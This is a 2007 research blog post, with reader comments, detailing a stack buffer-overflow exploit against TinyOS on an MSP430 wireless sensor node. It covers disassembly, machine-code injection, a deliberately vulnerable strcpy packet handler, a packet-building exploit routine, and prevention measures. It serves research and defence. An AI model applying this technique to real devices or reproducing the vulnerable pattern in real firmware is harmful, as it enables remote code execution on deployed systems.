Friday, August 3, 2007

MSP430 Buffer Overflow Exploit for Wireless Sensor Nodes

by Travis Goodspeed <travis at radiantmachines.com>


Abstract



What follows is a detailed account of the creation of a stack-overflow exploit targeting TinyOS 2.x on a Tmote Sky wireless sensor node, which uses the Texas Instruments MSP430 microcontroller. An example application is used as a target, rather than one which might be found in the wild. A firm knowledge of C, assembly language, and embedded systems architectures is assumed, but the details of NesC, the MSP430, and TinyOS are reviewed for those new to this platform. Finally, preventative measures are discussed.

Before We Begin


By default, the NesC compiler attaches the inline keyword to every function that it generates, even if that function began as a C function. To prevent this, use __attribute__ ((noinline)). Without this attribute, you'll go through hell trying to understand a function with twenty others embedded within it. Note that the inline keyword isn't what makes these attacks possible, it just makes them easier to understand.

Disassembly


I'll begin with a short example which uses gdb on a local image of a simple TinyOS application. This requires msp430-gdb, but does not require a JTAG debugger or any physical hardware.

Use the "disassemble" command to view an individual function.

(gdb) disassemble RadioCountToLedsC$red
Dump of assembler code for function RadioCountToLedsC$red:
0x000053f4 <radiocounttoledsc$red+0>: mov.b #1, r15 ;r3 As==01
0x000053f6 <radiocounttoledsc$red+2>: call #21500 ;#0x53fc
0x000053fa <radiocounttoledsc$red+6>: ret
End of assembler dump.
(gdb)
The original source for for this was
//within RadioCountToLedsC implementation
void __attribute__ ((noinline)) red(){
call Leds.set(1);
}


Note that the function acts just as its C equivalent would. red+0 loads the constant #1 from the constant generator r3 into r15, the register which contains the first parameter to a C function in the MSP430 version of GCC. A call is then made to 0x53fc, which we know as Leds.set().


Disassemble also accepts an address as its argument, so let's take a peek under the hood and see what Leds.set() does.

(gdb) disassemble 0x53fc
Dump of assembler code for function LedsP$Leds$set:
0x000053fc <ledsp$leds$set+0>: push r11 ;
0x000053fe <ledsp$leds$set+2>: mov.b r15, r11 ;
0x00005400 <ledsp$leds$set+4>: call #16460 ;#0x404c
0x00005404 <ledsp$leds$set+8>: mov.b r15, r14 ;
0x00005406 <ledsp$leds$set+10>: mov.b r11, r15 ;
0x00005408 <ledsp$leds$set+12>: and.b #1, r15 ;r3 As==01
0x0000540a <ledsp$leds$set+14>: jz $+10 ;abs 0x5414
0x0000540c <ledsp$leds$set+16>: and.b #-17, &0x0031 ;#0xffef
0x00005412 <ledsp$leds$set+22>: jmp $+8 ;abs 0x541a
0x00005414 <ledsp$leds$set+24>: bis.b #16, &0x0031 ;#0x0010
0x0000541a <ledsp$leds$set+30>: mov.b r11, r15 ;
0x0000541c <ledsp$leds$set+32>: and.b #2, r15 ;r3 As==10
0x0000541e <ledsp$leds$set+34>: jz $+10 ;abs 0x5428
0x00005420 <ledsp$leds$set+36>: and.b #-33, &0x0031 ;#0xffdf
0x00005426 <ledsp$leds$set+42>: jmp $+8 ;abs 0x542e
0x00005428 <ledsp$leds$set+44>: bis.b #32, &0x0031 ;#0x0020
0x0000542e <ledsp$leds$set+50>: mov.b r11, r15 ;
0x00005430 <ledsp$leds$set+52>: and.b #4, r15 ;r2 As==10
0x00005432 <ledsp$leds$set+54>: jz $+10 ;abs 0x543c
0x00005434 <ledsp$leds$set+56>: and.b #-65, &0x0031 ;#0xffbf
0x0000543a <ledsp$leds$set+62>: jmp $+8 ;abs 0x5442
0x0000543c <ledsp$leds$set+64>: bis.b #64, &0x0031 ;#0x0040
0x00005442 <ledsp$leds$set+70>: mov.b r14, r15 ;
0x00005444 <ledsp$leds$set+72>: call #16480 ;#0x4060
0x00005448 <ledsp$leds$set+76>: pop r11 ;
0x0000544a <ledsp$leds$set+78>: ret
End of assembler dump.
(gdb)


Note that this comes from the NesC declaration of
async command void set(uint8_t val);

which suggests that commands are rendered straight to C functions with the call keyword merely calling the function. In actual usage, call is used not to determine the way in which the function is called, but whether it's allowed. A command may not be called from an interrupt handler unless it also possesses the async keyword. Note that set() would have been automatically inlined if it had not been called from multiple source functions.

Inline Assembly



Inline assembly language is quite easy as well. Suppose that we would like to find the value of the stack pointer:
  int __attribute__ ((noinline))
getsp(){
__asm__("mov r1, r15");
}

The preceding code simply copies r1, the Stack Pointer, into r15, which mspgcc's ABI uses as the return register. Testing the disassembled code gives us:
(gdb) disassemble RadioCountToLedsC$getsp
Dump of assembler code for function RadioCountToLedsC$getsp:
0x000053f4 <RadioCountToLedsC$getsp+0>: mov r1, r15 ;
0x000053f6 <RadioCountToLedsC$getsp+2>: ret
End of assembler dump.
(gdb)


Note the use of r15 is arbitrary--different compilers use the registers for different things. I've written an article comparing IAR's ABI to that of GCC which explains the issue in detail.

Machine Language



The following msp-gdb session shows how to get the getsp() function as its machine-language bytes rather than as disassembled code:
(gdb) x/bx RadioCountToLedsC$getsp
0x53f4 <RadioCountToLedsC$getsp>: 0x0f
(gdb)
0x53f5 <RadioCountToLedsC$getsp+1>: 0x41
(gdb)
0x53f6 <RadioCountToLedsC$getsp+2>: 0x30
(gdb)
0x53f7 <RadioCountToLedsC$getsp+3>: 0x41
(gdb)

In the above example, x/bx means "examine as hexadecimal bytes." I could also have used x/hx to examine half-word bytes (words are 32 bit here, not 16), but the little-endian nature of the target platform makes that a little confusing, as the bytes are printed out of order.

What this means is that we can declare a C byte array of {0x0f,0x41,0x30,0x41} or a string of "\x0f\x41\x30\x41" at any even address and execute a call to its address in order to execute it. The even addressing is essential, as r0--the PC--cannot hold an unaligned address and unaligned word accesses are not supported by the MSP430. Because this architecture is little endian, the code as a 16-bit integer array is not {0x0f41, 0x3041} but rather {0x410f,0x4130}.

I've been using gcc and gdb to generate machine code, but the mspgcc project has made a single-instruction assembler available through the web. Remember that it gives results as little-endian words.

Instruction Emulation



It's important to realize that MSP430 assembly language contains many statements which don't exist on the physical chip. Instead they're emulated by translation in the assembler.

For example, suppose we have the following function using inline assembly:
  void __attribute__ ((noinline))
setled(){
asm("inv &0x0031");
}


INV is an emulated instruction which flips the bits of its destination by XORing them with 0xFFFF. Why should the chip have a separate instruction, when the programmer could simply call XOR #-1,&0x0031? In practice, that is what happens as our disassembly shows:
(gdb) disassemble BlinkC$setled
Dump of assembler code for function BlinkC$setled:
0x00004712 <BlinkC$setled+0>: xor #-1, &0x0031 ;r3 As==11
0x00004716 <BlinkC$setled+4>: ret
End of assembler dump.
(gdb)


Machine Language Execution Example


After a bit of effort, which would've been greatly reduced if my Flash Emulation Tool had arrived, I came up with the following piece of code:
int machlang[15]={
0xe3b2, 0x0031, //xor #-1,&0x31 (emulating INV)
0x4130 //ret
};
int (*machfn)() = NULL;
machfn= (int (*)()) machlang;
machfn();


The above code executes the machine language code to blink the LED by inverting the memory-mapped port at 0x31. The integers of machlang() may reside anywhere in the memory space, which is to say anywhere in RAM or ROM.

Buffer Overflow Stack Injection



Machine language injection works by virtue of the call stack, which grows downward in TinyOS from nearly the top of RAM (high address) to the bottom of RAM (low address, 0x200). When a function begins, the stack's lowest word contains the address of the calling function, such that when a function calls the "RET" instruction, it copies a value from the address pointed to by R1 (SP) into R0 (PC) and increments R1 to shrink the stack by a word.

The following code overwrites the stack's stored copy of the calling PC such that when it returns, control jumps to machlang instead of the calling function:
void __attribute__ ((noinline))
setled(){
//call it the rude way by overwriting the return address
int *oldpc=&oldpc;//point to top of frame
oldpc++;//inc by 2, not 1
*oldpc=machlang;//overwrite old PC
return;//return to machlang, not calling function
}


In the above code, the pointer oldpc is declared and incremented such that it points at the stack value pushed before itself, which is of course the stored PC value that the function will jump to when it returns. When return; is called, the processor jumps not to the calling function but rather to the machine code, causing it to be executed.

Buffer overflow injections work in a similar way, but rather than set the pointer explicitly by C code, they instead have a string that--when copied into a buffer--exceeds the end of the buffer and writes to the next position. The following code does just that, by calling strcpy() on a string composed of the machine language entry address repeated many times.
//code fragment: composition function
//compose a null-terminated string
//of repeating machlang addresses
for(payload=evilcmd;
payload<evilcmd+10;
payload++){
*payload=machlang;
}
*payload=0;//null-terminator

//code fragment, copying function
char cmd[6]="Hello";
strcpy(cmd,evilcmd);
return;//to machlang

//new machlang to enter an infinite loop.
int machlang[30]={
0xe3b2, 0x0031, //xor #-1,&0x31 (emulating INV)

//while(1);
0x4303, //mov r3,r3 (emulating NOP)
0x3fff, //jmp -2
};


This is a bit crude, in that it overwrites more than just the stored PC. Note, however, that the string can be dropped in with no specialized code in the copying function. In order to view the success of this, the machlang array must be changed to enter an infinite loop when complete. It cannot successfully return because it overwrote more than just the stack pointer it intended to. This is an unavoidable side-effect when the stack is as dense as it is on the MSP430, as the null terminator must be copied--thus unless the high word--that is the latter word in little endian--of the target address happens to be 0x00, the address immediately above that which we intend to overwrite must necessarily be clobbered.

Using a JTAG debugger (TI MSP-FETP430-PIF or TI MSP-FET430-UIF), it's trivial to view the stack. You'll notice that the stack is rather shallow, only two functions deep. As 'BlinkC$Timer0$fired' is called without stack parameters--those that don't fit into registers--a simple RET suffices to return past it. If parameters were on the stack, they could be removed with the POP instruction.

(gdb) break 'BlinkC$setled'
Breakpoint 1 at 0x4d46: file BlinkC.nc, line 99.
(gdb) continue
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
BlinkC$setled () at BlinkC.nc:99
(gdb) where
#0 BlinkC$setled () at BlinkC.nc:99
#1 0x00004d46 in BlinkC$Timer0$fired () at BlinkC.nc:128
#2 0x00004d46 in BlinkC$Timer0$fired () at BlinkC.nc:128
(gdb)


A Complete Exploit



Now that we've got machine code and a way to force it onto the stack, we are still left with the issue of knowing at which address it will be. On a workstation, desktop, or server, it's common practice to include NOP instructions before the code you intend to execute, such that you can guess at the target address. On x86 processors, this is particularly easy because of support for a byte-length NOP instruction (0x90) and unaligned access.

Wireless sensor nodes and other embedded systems require a different strategy. The payload of a packet is often so small that a single packet has barely got room for anything interesting, much less a bunch of word-length NOP instructions (0x4303, which is really MOV r3,r3). Fortunately, these systems emphasize static allocation. malloc() and similar usage of a heap is strongly discouraged, to the point that much documentation claims the method doesn't exist.

A consequence of static allocation is that of twenty nodes running the same firmware, twenty nodes will have every non-stack variable in the same location. This includes the functions which handle reception of an incoming packet. Thus, the easiest way to inject code into a live wireless sensor node by a single 802.15.4 packet is to craft a packet which--when copied over the stack--overwrites the return address with the address of the global copy of itself, not the stack's copy.

Executing the stack's copy is also possible, of course.

Target Application



For an example of a remote exploit, I threw together a simple application that accepts the shortened name of a color--RED, GREN, or BLUE--within a packet and enables the appropriate LED. The code is below:


void __attribute__ ((noinline))
docmd(radio_count_msg_t* rcm){

char cmd[6];
strcpy(cmd,rcm->cmd);


if(!strcmp(cmd,"RED"))
call Leds.set(1);
if(!strcmp(cmd,"GREN"))
call Leds.set(2);
if(!strcmp(cmd,"BLUE"))
call Leds.set(4);
return;
}

event message_t* Receive.receive(message_t* bufPtr,
void* payload, uint8_t len) {
char cmd[6];
radio_count_msg_t* rcm = (radio_count_msg_t*)payload;
docmd(rcm);

return bufPtr;
}




The first step is to determine where the packet resides in memory on the victim. I suppose it's possible to dig around TinyOS for the symbol of packet, but when debugging symbols might not be available, a more reliable technique is to search for the contents of the last packet sent:
(gdb) x/s 0x2a2
0x2a2: "\006RED"
(gdb)


Trying again for a different packet, at the same address I find
(gdb) x/s 0x2a2
0x2a2: "\006BLUE"
(gdb)


And one last time for the green led, I find
(gdb) x/s 0x2a2
0x2a2: "\006GREN"
(gdb)


At each stage, the light matches the string being given. This gives me both good and bad news. The good news is that my packet gets through, the bad news is that it's mis-aligned. The "\006" character is at 0x2a2, which means that the packet's string doesn't begin until 0x2a3, which is an odd address. Machine code may only reside at even addresses on the MSP430 and many other processors, with the X86 being a notable exception.

Once the target address is known, crafting an attack is as simple as stuffing the following things into the packet:
1. The executable machine code, even-aligned in the global packet.
2. The entry address off the machine code, even-aligned in the overflow onto the stack, offset such that it overwrites the program counter.
3. A terminating null character or word, such that strcpy() or its equivalent doesn't hit flash ROM.

These rules can be quite a juggling act, but expressed for the above example:
1. Executable code should begin at the second letter of the enclosed string, which will be 0x02a4 on the target.
2. 0x02a4 (0xa4 0x02 as bytes) must reside in bytes 7 and 8 of the string.
3. The string must end in zeros.
4. The first letter must not be a zero.

While it's not terribly difficult to do these things on paper, it's cleaner to do it in C. First we define our machine code in an array, as we did before:

volatile int machlang[30]={
//garbage;
0xdead,
0xbeef,

//to be obliterated
0x0f01,
0x0f02,

//to be executed
0xe3b2, //inv 0x0031
0x0031,
0x3ffd, //jmp -4
0x0000,
};


This has a lot of empty space and doesn't contain as much information as it might. The machine code in the suffix just blinks the LEDs in an infinite while loop, though in practice they blink faster than the human eye can see. The following code packs the machine code and the target address into a single string for sending as a packet. Note that the address and the machine code are differently aligned. This is because the address must be even aligned with the destination of the strcpy(), while the machine code must be evenly aligned in the source.

void __attribute__ ((noinline))
build_exploit(void* vstr)
{
char *str=(char*)vstr;
//machlang has zeroes, so it may not be used before the address.
//load the machine code, with weird but correct offset.
memcpy(attack+1,&machlang,16);

//load the attack address
memcpy(attack+6,&attackinit,2);

attack[8]=0;//zero out end, just in case.
memcpy(str,attack,20);
}



Prevention



Randomizing addresses would make these attacks more difficult to stage, particularly if every node ran a different build, such that no two nodes would store incoming packets at the same address. The compiler could also push an object of random size onto the stack such that it would follow a sort of drunkard's walk to prevent stack code from being jumped to.

A still more effective alternative would be an addition to the MSP430 itself, one that would branch to an exception handler if the program counter were ever outside of flash memory. This isn't a workstation, and there's rarely any reason to execute instructions from RAM. Thus, a simple register configuration which enabled and disabled execution from RAM would make the platform much more difficult to exploit.

As always, null-terminated string functions of unspecified length should never be used. There are other mistakes that make the stack vulnerable to corruption, but this is by and large the most common. strcpy() and its like should have been culled from the C language decades ago, but they're still with us and still being taught in introductory computer science classes.

I gave an informal introduction to this technique at the 2007 ACS Control Systems Cyber Security Conference in Knoxville, Tennessee. By far, the most common objections were that cryptography made this un-exploitable in practice or that the fence-line prevented malicious packets from reaching the target system.

Although it's true that cryptographically verifying received packets makes code injection more difficult, it does not make such injection impossible. Key management must have such a strict policy that a stolen node is de-authorized before an attacker can attach a JTAG cable to forcibly grab the key. Further, the JTAG fuse ought to be burned such that the node must be taken off-site for firmware extraction.

Regarding the fence-line, it's just a line in the sand as far as an attacker is concerned. 2.4Ghz amplifiers are rather easy to acquire, and the 150 meter range listed on the radios spec-sheet doesn't apply when an extra amplifier is attached. Even if we assume that the fence-line is effective--such as on a submarine--it's still possible to either bribe or trick an authorized employee into bringing a transmitter within the fence, or a packet sniffer in and then back out.

3 comments:

Travis Goodspeed said...

Thanks to Kris Pister for emailing me with the first erratum. I'd forgotten to include the source code for the vulnerable functions of my target application. This has been amended. My apologies to anyone who was confused by the prior revision.

Nathan said...

Boot loaders on MSP430s commonly load code into RAM and jump to it when upgrading firmware and writing to some flash areas either requires it or runs terrible if you don't do it (haven't read the product data sheets in a few years).

Travis Goodspeed said...

@Nathan, You're right that disabling execution of RAM isn't a solution, but it's not because of the bootloader. See Aurélien Francillon's CCS '08 paper for an example of remote code execution on the AVR, which can't execute RAM.

The MSP430 bootloader (BSL) has issues of its own, such as vulnerabilities to voltage glitching and side-channel timing analysis. See my paper from 25C3 for details.

Fetching any word from flash memory while it is busy yields 0x3FFF, or "JMP +0". This causes execution to pause until flash is ready once more. It can impact performance, but with RAM buffers for data you'll never notice.

The RAM patching mechanism is used because the BSL is in masked ROM, which can't be updated. As the new firmware image will only be in flash, it's usually safe to keep extra code in RAM without anything overwriting anything else. It's not strictly necessary, and you can find an example of a bootloader that executes from flash in my articles on the TI EZ430 or my second 25C3 lecture.

TI is presently rewriting the BSL to be more like the AVR bootloader, which resides in a separate section of flash memory that is not erased with the main section. This will allow for patches and updates without execution from RAM.

--Travis
<travis at radiantmachines.com>